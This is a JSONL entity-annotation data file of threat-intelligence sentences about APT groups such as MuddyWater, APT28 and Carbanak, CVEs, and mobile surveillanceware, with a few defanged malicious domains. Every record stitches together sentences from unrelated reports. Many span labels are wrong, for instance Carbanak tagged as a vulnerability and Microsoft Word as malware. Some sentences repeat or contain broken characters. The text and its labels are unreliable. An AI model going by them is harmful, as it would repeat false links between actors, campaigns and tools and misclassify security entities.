{"text": "It downloads one more archive and dynamically loads code from it . APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers .", "spans": [{"start": 67, "end": 72, "label": "Organization"}, {"start": 113, "end": 132, "label": "Vulnerability"}, {"start": 141, "end": 157, "label": "System"}, {"start": 158, "end": 167, "label": "System"}, {"start": 255, "end": 263, "label": "Organization"}, {"start": 272, "end": 284, "label": "Organization"}, {"start": 325, "end": 334, "label": "Organization"}, {"start": 356, "end": 365, "label": "Organization"}, {"start": 370, "end": 388, "label": "Organization"}, {"start": 391, "end": 413, "label": "Organization"}, {"start": 416, "end": 427, "label": "Organization"}, {"start": 430, "end": 449, "label": "Organization"}]}
{"text": "The final APK is downloaded from a different URL that is currently down , we assume that the apk purpose is overlaying ads on the screen , we assume this based on the research we have done on the API we found which returns URL of random APK file containing different advertising networks . The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 . The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes .", "spans": [{"start": 294, "end": 302, "label": "System"}, {"start": 400, "end": 413, "label": "Vulnerability"}, {"start": 416, "end": 429, "label": "Vulnerability"}, {"start": 451, "end": 477, "label": "Organization"}, {"start": 525, "end": 540, "label": "Indicator"}, {"start": 606, "end": 616, "label": "Organization"}, {"start": 641, "end": 653, "label": "Organization"}]}
{"text": "Persistency Watch-Dog The application contains protection against its own removal . We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit . MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call \" POWERSTATS \" .", "spans": [{"start": 148, "end": 161, "label": "Vulnerability"}, {"start": 172, "end": 180, "label": "System"}, {"start": 234, "end": 242, "label": "Vulnerability"}, {"start": 264, "end": 269, "label": "Organization"}, {"start": 362, "end": 399, "label": "Malware"}, {"start": 410, "end": 420, "label": "Malware"}]}
{"text": "As outlined in the diagram above , It installs an additional application with the same functionality and these two applications monitor the removal of each other . FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . When we looked at the cluster of activity which consisted of what appeared to be espionage-focused attacks in the Middle East , we were somewhat confused as the previous public reporting had attributed these attacks to FIN7 .", "spans": [{"start": 164, "end": 171, "label": "Organization"}, {"start": 218, "end": 223, "label": "Organization"}, {"start": 236, "end": 270, "label": "Vulnerability"}, {"start": 273, "end": 286, "label": "Vulnerability"}, {"start": 303, "end": 318, "label": "System"}, {"start": 564, "end": 568, "label": "Organization"}]}
{"text": "If one of the applications is deleted , the second application downloads and re-installs the removed one . FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . FIN7 is a threat actor group that is financially motivated with targets in the restaurant , services and financial sectors .", "spans": [{"start": 107, "end": 134, "label": "Organization"}, {"start": 181, "end": 186, "label": "Organization"}, {"start": 199, "end": 233, "label": "Vulnerability"}, {"start": 236, "end": 249, "label": "Vulnerability"}, {"start": 266, "end": 281, "label": "System"}, {"start": 308, "end": 312, "label": "Organization"}, {"start": 387, "end": 397, "label": "Organization"}, {"start": 400, "end": 408, "label": "Organization"}, {"start": 413, "end": 430, "label": "Organization"}]}
{"text": "Network activity BrainTest communicates with five servers : APK files provider ( http : //psserviceonline [ . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . Following the trail of existing public reporting , the tie to FIN7 is essentially made based on a download observed from a MuddyWater C2 , of a non-public tool \" DNSMessenger \" .", "spans": [{"start": 81, "end": 109, "label": "Indicator"}, {"start": 140, "end": 145, "label": "Organization"}, {"start": 164, "end": 171, "label": "Organization"}, {"start": 215, "end": 231, "label": "Vulnerability"}, {"start": 357, "end": 368, "label": "Organization"}, {"start": 433, "end": 437, "label": "Organization"}, {"start": 494, "end": 507, "label": "Malware"}, {"start": 515, "end": 530, "label": "Malware"}, {"start": 533, "end": 545, "label": "Malware"}]}
{"text": "] com/ ) : This server provides APK files with advertising network . A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . There was a mistake in the original Morphisec analysis which linked these attacks to FIN7 .", "spans": [{"start": 99, "end": 115, "label": "Organization"}, {"start": 134, "end": 141, "label": "Organization"}, {"start": 185, "end": 201, "label": "Vulnerability"}, {"start": 327, "end": 338, "label": "Organization"}, {"start": 377, "end": 386, "label": "Organization"}, {"start": 426, "end": 430, "label": "Organization"}]}
{"text": "We found two functions : The first function is http : //s.psserviceonline [ . Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . The DNSMessenger malware is a shared tool , used by FIN7 , MuddyWater and perhaps other groups .", "spans": [{"start": 47, "end": 77, "label": "Indicator"}, {"start": 78, "end": 87, "label": "Organization"}, {"start": 98, "end": 114, "label": "Organization"}, {"start": 132, "end": 173, "label": "Vulnerability"}, {"start": 176, "end": 189, "label": "Vulnerability"}, {"start": 236, "end": 242, "label": "System"}, {"start": 307, "end": 319, "label": "Malware"}, {"start": 320, "end": 327, "label": "Malware"}, {"start": 355, "end": 359, "label": "Organization"}, {"start": 362, "end": 372, "label": "Organization"}, {"start": 391, "end": 397, "label": "Organization"}]}
{"text": "] com/api/s2s/tracks/ and is used for activation . Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . In September 2018 , we found evidence of Seedworm and the espionage group APT28 ( aka Swallowtail , Fancy Bear ) , on a computer within the Brazil-based embassy of an oil-producing nation .", "spans": [{"start": 51, "end": 60, "label": "Organization"}, {"start": 71, "end": 76, "label": "Organization"}, {"start": 94, "end": 135, "label": "Vulnerability"}, {"start": 138, "end": 151, "label": "Vulnerability"}, {"start": 198, "end": 204, "label": "System"}, {"start": 306, "end": 314, "label": "Organization"}, {"start": 339, "end": 344, "label": "Organization"}, {"start": 351, "end": 362, "label": "Organization"}, {"start": 365, "end": 375, "label": "Organization"}, {"start": 418, "end": 425, "label": "Organization"}]}
{"text": "The second function is http : //s.psserviceonline [ . BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded .", "spans": [{"start": 23, "end": 53, "label": "Indicator"}, {"start": 54, "end": 67, "label": "Organization"}, {"start": 123, "end": 145, "label": "Vulnerability"}, {"start": 334, "end": 351, "label": "Malware"}, {"start": 371, "end": 389, "label": "Malware"}, {"start": 398, "end": 410, "label": "Malware"}, {"start": 511, "end": 518, "label": "System"}, {"start": 543, "end": 554, "label": "Indicator"}]}
{"text": "] com/api/ads/ which is used for obtaining a link to APK file . The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . Seedworm likely functions as a cyber espionage group to secure actionable intelligence that could benefit their sponsor 's interests .", "spans": [{"start": 68, "end": 73, "label": "Organization"}, {"start": 129, "end": 151, "label": "Vulnerability"}, {"start": 311, "end": 319, "label": "Organization"}]}
{"text": "Regardless of the parameters , it returns a json containing a link for APK file . BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . During the operations , the group used tools consistent with those leveraged during past intrusions including Powermud , a custom tool used by the Seedworm group , and customized PowerShell , LaZagne , and Crackmapexec scripts .", "spans": [{"start": 82, "end": 95, "label": "Organization"}, {"start": 178, "end": 192, "label": "System"}, {"start": 218, "end": 232, "label": "Vulnerability"}, {"start": 361, "end": 369, "label": "Malware"}, {"start": 398, "end": 412, "label": "Organization"}, {"start": 419, "end": 440, "label": "Malware"}, {"start": 443, "end": 450, "label": "Malware"}, {"start": 457, "end": 477, "label": "Malware"}]}
{"text": "File Server ( http : //www.psservicedl [ . The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control ( C&C ) location .", "spans": [{"start": 14, "end": 42, "label": "Indicator"}, {"start": 47, "end": 52, "label": "Organization"}, {"start": 135, "end": 149, "label": "System"}, {"start": 175, "end": 189, "label": "Vulnerability"}, {"start": 212, "end": 226, "label": "Organization"}, {"start": 240, "end": 257, "label": "Malware"}, {"start": 307, "end": 326, "label": "System"}, {"start": 329, "end": 332, "label": "System"}]}
{"text": "] com ) : Contains android packages , java archives and zip archives with exploits Archive Link domains : Three domains with the same functionality , but the application chooses one of them to send request for archive link . While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . After compromising a system , typically by installing Powermud or Powemuddy , Seedworm first runs a tool that steals passwords saved in users ' web browsers and email , demonstrating that access to the victim 's email , social media , and chat accounts is one of their likely goals .", "spans": [{"start": 19, "end": 26, "label": "System"}, {"start": 264, "end": 275, "label": "Organization"}, {"start": 287, "end": 300, "label": "Organization"}, {"start": 367, "end": 380, "label": "Vulnerability"}, {"start": 521, "end": 529, "label": "Malware"}, {"start": 533, "end": 542, "label": "Malware"}, {"start": 545, "end": 553, "label": "Organization"}, {"start": 679, "end": 684, "label": "System"}]}
{"text": "http : //www.himobilephone [ . While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . Seedworm then uses open-source tools such as LaZagne and Crackmapexec to obtain Windows authorization credentials .", "spans": [{"start": 0, "end": 30, "label": "Indicator"}, {"start": 70, "end": 81, "label": "Organization"}, {"start": 113, "end": 126, "label": "Organization"}, {"start": 193, "end": 206, "label": "Vulnerability"}, {"start": 293, "end": 301, "label": "Organization"}, {"start": 338, "end": 345, "label": "Malware"}, {"start": 350, "end": 362, "label": "Malware"}, {"start": 373, "end": 380, "label": "System"}]}
{"text": "] com http : //www.adsuperiorstore [ . Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . The group , which we call Seedworm ( aka MuddyWater ) , has been operating since at least 2017 , with its most recent activity observed in December 2018 .", "spans": [{"start": 6, "end": 38, "label": "Indicator"}, {"start": 39, "end": 47, "label": "Vulnerability"}, {"start": 90, "end": 97, "label": "System"}, {"start": 115, "end": 124, "label": "Organization"}, {"start": 223, "end": 231, "label": "Organization"}, {"start": 238, "end": 248, "label": "Organization"}]}
{"text": "] com http : //www.i4vip [ . If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . The Seedworm group is the only group known to use the Powermud backdoor .", "spans": [{"start": 6, "end": 28, "label": "Indicator"}, {"start": 61, "end": 69, "label": "Vulnerability"}, {"start": 238, "end": 251, "label": "Vulnerability"}, {"start": 291, "end": 305, "label": "Organization"}, {"start": 341, "end": 358, "label": "Malware"}]}
{"text": "] com Counter Measures Use an up to date anti-malware software that is capable of identifying this threat . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . Additionally , the group compromised organizations in Europe and North America that have ties to the Middle East .", "spans": [{"start": 165, "end": 188, "label": "System"}, {"start": 191, "end": 194, "label": "System"}, {"start": 199, "end": 207, "label": "Vulnerability"}]}
{"text": "If the threat reappears on the device after the first installation , it means that the malware managed to install the persistency module in the System directory . Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system . MuddyWater is an Iranian high-profile threat actor that 's been seen active since 2017 .", "spans": [{"start": 163, "end": 171, "label": "Vulnerability"}, {"start": 308, "end": 318, "label": "Organization"}]}
{"text": "In this case , the device should be re-flashed with an official ROM . Sensitive bank documents have be found on the servers that were controlling Carbanak . Little detail is given on the nature of how the connection between DNSMessenger and MuddyWater was discovered it isn't possible for us to verify this link .", "spans": [{"start": 146, "end": 154, "label": "Vulnerability"}, {"start": 224, "end": 236, "label": "Malware"}, {"start": 241, "end": 251, "label": "Malware"}]}
{"text": "Lookout Discovers Phishing Sites Distributing New IOS And Android Surveillanceware April 8 , 2019 For the past year , Lookout researchers have been tracking Android and iOS surveillanceware , that can exfiltrate contacts , audio recordings , photos , location , and more from devices . Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa . Over the past year , we've seen the group extensively targeting a wide gamut of entities in various sectors , including Governments , Academy , Crypto-Currency , Telecommunications and the Oil sectors .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 50, "end": 53, "label": "System"}, {"start": 58, "end": 65, "label": "System"}, {"start": 66, "end": 82, "label": "Malware"}, {"start": 118, "end": 125, "label": "Organization"}, {"start": 157, "end": 164, "label": "System"}, {"start": 169, "end": 172, "label": "System"}, {"start": 173, "end": 189, "label": "Malware"}, {"start": 324, "end": 332, "label": "Vulnerability"}, {"start": 333, "end": 342, "label": "Organization"}, {"start": 578, "end": 589, "label": "Organization"}, {"start": 592, "end": 599, "label": "Organization"}, {"start": 602, "end": 617, "label": "Organization"}, {"start": 620, "end": 638, "label": "Organization"}, {"start": 647, "end": 658, "label": "Organization"}]}
{"text": "As has been previously reported , some versions of the Android malware were present in the Google Play Store . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . Little detail is given on the nature of how the connection between DNSMessenger and MuddyWater was discovered it isn't possible for us to verify this link .", "spans": [{"start": 55, "end": 62, "label": "System"}, {"start": 91, "end": 108, "label": "System"}, {"start": 131, "end": 139, "label": "Vulnerability"}, {"start": 206, "end": 215, "label": "Organization"}, {"start": 256, "end": 274, "label": "Organization"}, {"start": 298, "end": 307, "label": "Organization"}, {"start": 377, "end": 389, "label": "Malware"}, {"start": 394, "end": 404, "label": "Malware"}]}
{"text": "The iOS versions were available outside the app store , through phishing sites , and abused the Apple Developer Enterprise program . This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies . Depending on each sample , the content of document is either a fake resume application , or a letter from the Ministry of Justice in Lebanon or Saudi Arabia .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 44, "end": 53, "label": "System"}, {"start": 96, "end": 122, "label": "Organization"}, {"start": 205, "end": 213, "label": "Vulnerability"}, {"start": 230, "end": 248, "label": "Organization"}, {"start": 259, "end": 276, "label": "Organization"}, {"start": 279, "end": 294, "label": "Organization"}, {"start": 299, "end": 311, "label": "Organization"}, {"start": 377, "end": 400, "label": "Malware"}, {"start": 408, "end": 414, "label": "Malware"}]}
{"text": "Background : Android surveillanceware Early last year , Lookout discovered a sophisticated Android surveillanceware agent that appears to have been created for the lawful intercept market . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network .", "spans": [{"start": 13, "end": 20, "label": "System"}, {"start": 56, "end": 63, "label": "Organization"}, {"start": 91, "end": 98, "label": "System"}, {"start": 190, "end": 198, "label": "Vulnerability"}, {"start": 266, "end": 274, "label": "Organization"}, {"start": 366, "end": 373, "label": "System"}, {"start": 392, "end": 443, "label": "Organization"}, {"start": 446, "end": 450, "label": "Organization"}, {"start": 486, "end": 504, "label": "Indicator"}, {"start": 523, "end": 531, "label": "Organization"}, {"start": 535, "end": 552, "label": "Indicator"}, {"start": 559, "end": 569, "label": "Malware"}, {"start": 696, "end": 703, "label": "Vulnerability"}]}
{"text": "The agent appears to have been under development for at least five years and consists of three stages . From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . From January 2018 to March 2018 , through FireEye 's Dynamic Threat Intelligence , we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East .", "spans": [{"start": 114, "end": 122, "label": "Vulnerability"}, {"start": 159, "end": 164, "label": "Organization"}, {"start": 169, "end": 187, "label": "Organization"}, {"start": 229, "end": 234, "label": "Organization"}, {"start": 279, "end": 317, "label": "Organization"}, {"start": 332, "end": 341, "label": "Organization"}]}
{"text": "First , there is a small dropper , then a large second stage payload that contains multiple binaries ( where most of the surveillance functionality is implemented ) , and finally a third stage which typically uses the DirtyCOW exploit ( CVE-2016-5195 ) to obtain root . Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems . MuddyWater has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia .", "spans": [{"start": 218, "end": 234, "label": "Vulnerability"}, {"start": 237, "end": 250, "label": "Vulnerability"}, {"start": 281, "end": 289, "label": "Vulnerability"}, {"start": 349, "end": 354, "label": "Organization"}, {"start": 361, "end": 376, "label": "Organization"}, {"start": 379, "end": 389, "label": "Organization"}, {"start": 447, "end": 463, "label": "Organization"}]}
{"text": "Security Without Borders has recently published an analysis of this family , independently , through their blog . To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer . This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia .", "spans": [{"start": 0, "end": 24, "label": "Organization"}, {"start": 185, "end": 193, "label": "Vulnerability"}, {"start": 288, "end": 298, "label": "System"}, {"start": 303, "end": 314, "label": "System"}, {"start": 322, "end": 327, "label": "Organization"}, {"start": 385, "end": 401, "label": "Organization"}]}
{"text": "Several technical details indicated that the software was likely the product of a well-funded development effort and aimed at the lawful intercept market . Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research . When successfully executed , the malicious documents install a backdoor we track as POWERSTATS .", "spans": [{"start": 184, "end": 192, "label": "Vulnerability"}, {"start": 226, "end": 231, "label": "Organization"}, {"start": 412, "end": 420, "label": "Malware"}, {"start": 433, "end": 443, "label": "Malware"}]}
{"text": "These included the use of certificate pinning and public key encryption for C2 communications , geo-restrictions imposed by the C2 when delivering the second stage , and the comprehensive and well implemented suite of surveillance features . These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider . The group is known for espionage campaigns in the Middle East .", "spans": [{"start": 270, "end": 285, "label": "Organization"}, {"start": 346, "end": 354, "label": "Organization"}, {"start": 390, "end": 398, "label": "Vulnerability"}, {"start": 416, "end": 437, "label": "Organization"}, {"start": 450, "end": 463, "label": "Organization"}]}
{"text": "Early versions of the Android application used infrastructure which belonged to a company named Connexxa S.R.L . The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police . The threat group in this recently observed campaign \u2013 TEMP.Zagros \u2013 weaponized their malware using the following techniques .", "spans": [{"start": 22, "end": 29, "label": "System"}, {"start": 96, "end": 112, "label": "Organization"}, {"start": 131, "end": 141, "label": "Organization"}, {"start": 153, "end": 161, "label": "Vulnerability"}, {"start": 210, "end": 232, "label": "Organization"}]}
{"text": "and were signed using the name of an engineer who appears to hold equity in Connexxa . Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt . The MuddyWater campaign was first sighted in 2017 when it targeted the Saudi government using an attack involving PowerShell scripts deployed via Microsoft Office Word macro .", "spans": [{"start": 76, "end": 84, "label": "Organization"}, {"start": 104, "end": 119, "label": "Organization"}, {"start": 145, "end": 150, "label": "Organization"}, {"start": 153, "end": 162, "label": "Organization"}, {"start": 175, "end": 197, "label": "Organization"}, {"start": 247, "end": 255, "label": "Vulnerability"}, {"start": 260, "end": 266, "label": "System"}, {"start": 346, "end": 356, "label": "Organization"}, {"start": 383, "end": 401, "label": "Malware"}, {"start": 415, "end": 424, "label": "Malware"}, {"start": 425, "end": 436, "label": "Malware"}]}
{"text": "This engineer \u2019 s name is also associated with a company called eSurv S.R.L . Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent . The threat group in this recently observed campaign a TEMP.Zagros a weaponized their malware using the following techniques .", "spans": [{"start": 64, "end": 77, "label": "Organization"}, {"start": 109, "end": 120, "label": "Organization"}, {"start": 125, "end": 135, "label": "System"}, {"start": 258, "end": 266, "label": "System"}, {"start": 333, "end": 339, "label": "System"}, {"start": 344, "end": 354, "label": "System"}]}
{"text": "eSurv \u2019 s public marketing is centered around video surveillance software and image recognition systems , but there are a number of individuals claiming to be mobile security researchers working at the company , including one who has publically made claims to be developing a mobile surveillance agent . Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries . Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 379, "end": 387, "label": "Vulnerability"}, {"start": 392, "end": 411, "label": "Organization"}, {"start": 513, "end": 535, "label": "Organization"}, {"start": 623, "end": 637, "label": "System"}, {"start": 708, "end": 718, "label": "System"}, {"start": 721, "end": 723, "label": "System"}]}
{"text": "Moreover , eSurv was a business unit of Connexxa and was leased to eSurv S.R.L in 2014 . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . MuddyWater is a relatively new APT that surfaced in 2017 .", "spans": [{"start": 11, "end": 16, "label": "Organization"}, {"start": 40, "end": 48, "label": "Organization"}, {"start": 67, "end": 78, "label": "Organization"}, {"start": 139, "end": 143, "label": "Organization"}, {"start": 177, "end": 185, "label": "Vulnerability"}, {"start": 215, "end": 224, "label": "Organization"}, {"start": 227, "end": 237, "label": "Organization"}]}
{"text": "This business unit and the eSurv software and brand was sold from Connexxa S.R.L . In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company . We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro as MuddyWater ) , an Iran-nexus actor that has been active since at least May 2017 .", "spans": [{"start": 27, "end": 32, "label": "Organization"}, {"start": 66, "end": 82, "label": "Organization"}, {"start": 112, "end": 120, "label": "Vulnerability"}, {"start": 151, "end": 172, "label": "Organization"}, {"start": 299, "end": 310, "label": "Organization"}, {"start": 325, "end": 343, "label": "Organization"}, {"start": 348, "end": 359, "label": "Organization"}, {"start": 363, "end": 373, "label": "Organization"}, {"start": 392, "end": 397, "label": "Organization"}]}
{"text": "to eSurv S.R.L . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro ) , an Iran-nexus actor that has been active since at least May 2017 .", "spans": [{"start": 3, "end": 16, "label": "Organization"}, {"start": 81, "end": 105, "label": "Malware"}, {"start": 117, "end": 130, "label": "Vulnerability"}, {"start": 163, "end": 174, "label": "Organization"}, {"start": 189, "end": 207, "label": "Organization"}, {"start": 212, "end": 223, "label": "Organization"}, {"start": 242, "end": 247, "label": "Organization"}]}
{"text": "on Feb 28 , 2016 . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . Entities in these sectors are often \" enabling victims \" as telecommunications providers or IT services agencies and vendors could provide Seedworm actors with further victims to compromise .", "spans": [{"start": 19, "end": 27, "label": "Organization"}, {"start": 49, "end": 76, "label": "Vulnerability"}, {"start": 79, "end": 92, "label": "Vulnerability"}, {"start": 138, "end": 152, "label": "Malware"}, {"start": 155, "end": 168, "label": "Vulnerability"}, {"start": 175, "end": 191, "label": "System"}, {"start": 194, "end": 207, "label": "Vulnerability"}, {"start": 272, "end": 300, "label": "Organization"}, {"start": 304, "end": 324, "label": "Organization"}, {"start": 351, "end": 366, "label": "Organization"}]}
{"text": "Lookout notified Google of the potential threat shortly after it was discovered . While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 . The group mainly targets the telecommunications and IT services sectors .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 17, "end": 23, "label": "Organization"}, {"start": 229, "end": 242, "label": "Vulnerability"}, {"start": 245, "end": 258, "label": "Vulnerability"}, {"start": 265, "end": 278, "label": "Vulnerability"}, {"start": 310, "end": 328, "label": "Organization"}, {"start": 333, "end": 352, "label": "Organization"}]}
{"text": "Together , during the latter half of 2018 , we worked to remove the apps from the Play store while it was being deployed in the wild . The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant . However , the group behind MuddyWater has been known to target other countries in the Middle East , Europe and the US .", "spans": [{"start": 82, "end": 92, "label": "System"}, {"start": 174, "end": 187, "label": "Vulnerability"}, {"start": 200, "end": 208, "label": "Organization"}, {"start": 283, "end": 293, "label": "Organization"}]}
{"text": "iOS development Analysis of these Android samples led to the discovery of infrastructure that contained several samples of an iOS port . Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . The group has focused mainly on governmental targets in Iraq and Saudi Arabia , according to past telemetry .", "spans": [{"start": 0, "end": 3, "label": "System"}, {"start": 34, "end": 41, "label": "System"}, {"start": 126, "end": 129, "label": "System"}, {"start": 137, "end": 146, "label": "Malware"}, {"start": 156, "end": 169, "label": "Vulnerability"}, {"start": 287, "end": 299, "label": "Organization"}]}
{"text": "So far , this software ( along with the Android version ) has been made available through phishing sites that imitated Italian and Turkmenistani mobile carriers . WannaCry utilizes EternalBlue by crafting a custom SMB session request with hard-coded values based on the target system . The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros .", "spans": [{"start": 40, "end": 47, "label": "System"}, {"start": 163, "end": 171, "label": "System"}, {"start": 181, "end": 192, "label": "Vulnerability"}, {"start": 214, "end": 217, "label": "System"}, {"start": 322, "end": 332, "label": "Organization"}, {"start": 341, "end": 359, "label": "Organization"}]}
{"text": "Wind Tre SpA - an Italian telecom operator TMCell - the state owned mobile operator in Turkmenistan Deployment to users outside Apple \u2019 s app store was made possible through abuse of Apple \u2019 s enterprise provisioning system . WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 . MuddyWater has recently been targeting victims likely from Lebanon and Oman , while leveraging compromised domains , one of which is owned by an Israeli web developer .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 43, "end": 49, "label": "Organization"}, {"start": 128, "end": 133, "label": "Organization"}, {"start": 183, "end": 188, "label": "Organization"}, {"start": 226, "end": 234, "label": "System"}, {"start": 270, "end": 281, "label": "Vulnerability"}, {"start": 311, "end": 325, "label": "Organization"}, {"start": 347, "end": 357, "label": "Organization"}]}
{"text": "The Apple Developer Enterprise program is intended to allow organizations to distribute proprietary , in-house apps to their employees without needing to use the iOS App Store . Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 . As MuddyWater has consistently been using POWERSTATS as its main tool , they are relatively easy to distinguish from other actors .", "spans": [{"start": 4, "end": 30, "label": "Organization"}, {"start": 162, "end": 165, "label": "System"}, {"start": 166, "end": 175, "label": "System"}, {"start": 178, "end": 187, "label": "Organization"}, {"start": 202, "end": 223, "label": "Vulnerability"}, {"start": 275, "end": 285, "label": "Organization"}, {"start": 314, "end": 324, "label": "Malware"}, {"start": 395, "end": 401, "label": "Organization"}]}
{"text": "A business can obtain access to this program only provided they meet requirements set out by Apple . The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April . In March 2018 , Trend Micro provided a detailed analysis of another campaign that bore the hallmarks of MuddyWater .", "spans": [{"start": 93, "end": 98, "label": "Organization"}, {"start": 123, "end": 136, "label": "Vulnerability"}, {"start": 180, "end": 194, "label": "Organization"}, {"start": 195, "end": 207, "label": "Organization"}, {"start": 235, "end": 246, "label": "Organization"}, {"start": 323, "end": 333, "label": "Organization"}]}
